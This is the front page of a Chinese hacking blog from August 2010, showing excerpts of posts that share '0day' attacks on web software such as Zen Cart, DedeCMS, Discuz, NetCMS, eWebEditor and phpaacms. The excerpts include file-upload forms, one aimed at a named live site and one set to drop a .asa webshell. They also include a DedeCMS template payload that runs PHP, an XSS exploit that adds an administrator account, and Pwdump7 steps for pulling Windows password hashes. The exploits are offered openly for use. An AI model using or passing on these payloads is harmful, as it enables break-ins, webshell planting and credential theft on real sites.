影子鹰安全网络-主站技术BLOG, 进阶式的学习平台...
 
用户登陆
用户:
密码:
   

站点日历
73 2010 - 8 48
1234567
891011121314
15161718192021
22232425262728
293031

站点统计
日志:1320 篇
评论:3702 篇
引用:303812 个
会员:1170 人
留言:172 个
访问:18749344 次
今日:18670 平均:7000
建站:2001-10-10
在线人数: ?

最新评论

日志搜索

 标题   内容

友情链接
其他信息
影子鹰安全网络-主站技术BLOG
::订阅到抓虾::
订阅到飞鸽
订阅到GOOGLE
订阅到yahoo
订阅到ROJO
RSS 1.0
RSS 2.0
[全部订阅更新]
[鄂ICP备05002492号]
联系我

::影子鹰业务联系专用QQ:;

Gmail:coolkawen(at)Gmail.com站长KAWEN联系方式
QQ群(::Blog交流::)

旗下域名

www.cn9x.com
www.cnyzy.cn


FEED订阅数一览


EMAIL订阅FEED

[1] [2] [3]  显示模式: 默认模式 | 树形模式
晴天 zen cart 1.38a 多处漏洞0day   [ 2010-08-31 08:24:50  |  影子鹰 ]

<form id="frmUpload" enctype="multipart/form-data" action="http://aus-snowboots.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">
Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>

阅读全文……
作者:kawen | 分类:黑客攻防 | 评论:0 | 引用:0 | 查看:24

本地包含的利用方法。

<form action=”http://www.ra1nker/plus/carbuyaction.php?dopost=return&action=xxx&code=../../include/dialog/select_soft_post” method=”post” enctype=”multipart/form-data” name=”QuickSearch” id=”QuickSearch”>
<input type=”hidden” name=”newname” value=”1.asa”>
<input type=”file” name=”uploadfile”>

阅读全文……
作者:kawen | 分类:黑客攻防 | 评论:0 | 引用:0 | 查看:37
晴天 NetCms 注册上传漏洞 Oday   [ 2010-08-26 11:30:51  |  影子鹰 ]

NetCMS网站内容管理系是国内最优秀的网站建设程序,全免费全开源 ,由于发表消息附件未

进行严格过滤,导致可上传任意文件漏洞。

测试利用: 1、进去, /user/login.aspx ,点注册。

阅读全文……
作者:kawen | 分类:黑客攻防 | 评论:0 | 引用:0 | 查看:40
晴天 Discuz!漫游插件API本地包含漏洞   [ 2010-08-26 11:30:04  |  影子鹰 ]

Discuz!漫游插件API本地包含漏洞,该插件默认不安装,并且服务默认不开启.

manyou/api/class/MyBase.php

128: function parseRequest() {

阅读全文……
作者:kawen | 分类:黑客攻防 | 评论:0 | 引用:0 | 查看:37
晴天 dvbbs php2.0 0day   [ 2010-08-24 08:28:50  |  影子鹰 ]

joinvipgroup.php   //注入

Copy to clipboard 

Code:

阅读全文……
作者:kawen | 分类:黑客攻防 | 评论:0 | 引用:0 | 查看:51
晴天 discuz 7.x xss 反射型exploit   [ 2010-08-22 09:06:34  |  影子鹰 ]

discuz 7.X 有个反射型XSS,一直都没有补,读者可以去Google一下,以下是该XSS的利用代码,用ajax添加用户并加为管理员,再发邮件通知。大家拿去玩吧。 
此反射型XSS在ajax.php中,exploit如下:

var type = "Discuz 7 ";
var username_add = "blackcushion020";

阅读全文……
作者:kawen | 分类:黑客攻防 | 评论:0 | 引用:0 | 查看:51
晴天 ewebeditor高版本>=5.5鸡肋0day   [ 2010-08-22 09:06:08  |  影子鹰 ]

利用方法:

先访问这个地址
Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=qing.asp
访问这个地址可以建立个qing.ASP的文件夹……

阅读全文……
作者:kawen | 分类:黑客攻防 | 评论:0 | 引用:0 | 查看:45
晴天 使用Pwdump7提取系统密码hash值   [ 2010-08-20 08:31:14  |  影子鹰 ]

首先,下载“Pwdump7.rar”这个文件,并将其解压到D盘根目录下。接着,打开“命令提示符”窗口并输入“PwDump7”命令,在按下回车键后即可看到如图所示的结果。


图 命令执行结果这里的“PASSWORD”后面是一串星号,这表示当前帐户没有设置密码。当我们为Administrator帐户设置一个密码后,再次运行“PwDump7”命令时,就会得到如下内容:Administrator:500:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::这个获得的密码是一个密文,我们还需要对其进行反译才能获得相应的明文密码。先来看一下“PwDump7”命令的其他用法:pwdump7.exe -s     (Dump passwords from files)pwdump7.exe -d [destionation] (Copy filename to destionation)pwdump7.exe -h                           (Show this help)这里的“-s”参数,是指从SAM数据库文件中提取hash,这个文件位于“%systemroot%\config\sam”目录中。这里的“-d”参数,是指把一个文件复制到另一个位置,如命令可以是:D:\>PwDump7.exe –d c:\abc.sys abc.chm这个转移参数的最大魅力,是可以把进程正在调用的文件复制成功,如复制“pagefile.sys ”文件。

阅读全文……
作者:kawen | 分类:资源共享 | 评论:0 | 引用:0 | 查看:74
晴天 phpaacms 4.0 Sql 注入0day漏洞   [ 2010-08-20 08:30:15  |  影子鹰 ]

phpaacms是一套免费开源的简洁文章管理系统cms.

漏洞文件:search.php //变量$_GET['id']过滤不严造成的注射         

测试EXP:

阅读全文……
作者:kawen | 分类:黑客攻防 | 评论:0 | 引用:0 | 查看:50
晴天 dedecms v5.3-v5.6 Get Shell 0day利用   [ 2010-08-19 09:01:18  |  影子鹰 ]

此0day已经出现了相当长一段时间,今天配合小龙同学提供的日志看了下代码,了解了漏洞成因。大多同学对成因不感兴趣,这儿就只公布利用方法。

Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}

阅读全文……
作者:kawen | 分类:黑客攻防 | 评论:0 | 引用:0 | 查看:87
晴天 DEDECMS 文件源码泄漏AND GetShell漏洞   [ 2010-08-19 08:58:52  |  影子鹰 ]

article_edit.php在处理用户自定义数据的时候/*------------------------------function _SaveArticle(){ }------------------------------*/else if($dopost=='save'){         include(DEDEMEMBER.'/inc/archives_check.php');         //分析处理附加表数据         $inadd_f = $inadd_v = '';if(!empty($dede_addonfields)) //注意这里         {                   $addonfields = explode(';',$dede_addonfields);                   $inadd_f = '';                   $inadd_v = '';                   if(is_array($addonfields))                   {                            foreach($addonfields as $v)                            {                                     if($v=='')                                     {                                               continue;                                     }                                     $vs = explode(',',$v);                                     if(!isset(${$vs[0]}))                                     {                                               ${$vs[0]} = '';                                     }                                     ${$vs[0]} = GetFieldValueA(${$vs[0]},$vs[1],0);                                     $inadd_f .= ','.$vs[0];                                     $inadd_v .= " ,'".${$vs[0]}."' ";                            }                   }         }。。。。。。         $upQuery = "Update `$addtable` set typeid='$typeid',body='$body'{$inadd_f},userip='$userip' where aid='$aid' ";                   if(!$dsql->ExecuteNoneQuery($upQuery))                   {                            ShowMsg("更新附加表 `$addtable` 时出错,请联系管理员!","javascript:;");                            exit();                   }从上面可以看出 变量$dede_addonfields 没有进行严格控制(这是因为自定义模型所造成),没有限制用户所提交的信息,造成SQL注入漏洞。结合附加表数据自定义模板,造成暴任意文件源码漏洞。上传图片模板,可执行任意代码。
测试方法:首先要有发表文章的权限(不需要审核通过,只要有发表和预览权限) 再修改内容在FF的FireBUG 下找到隐藏的dede_addonfields,关设置为显示,并且增加一个表单变量,templet 并设置变量为: 提交。现在 查看文章看:再查看源码 扩展利用:可以以附件形式上传任意设计的模板文件,在服务器解释执行。解决方案:改变附加表数据处理方式,或验证hash
GetShell

发表文章时上传图片如1.jpg

阅读全文……
作者:kawen | 分类:黑客攻防 | 评论:0 | 引用:0 | 查看:42
[1] [2] [3] 
  Powered by www.cnyzy.cn Rights © 2006 Processed in 0.625000 second(s) , 5 queries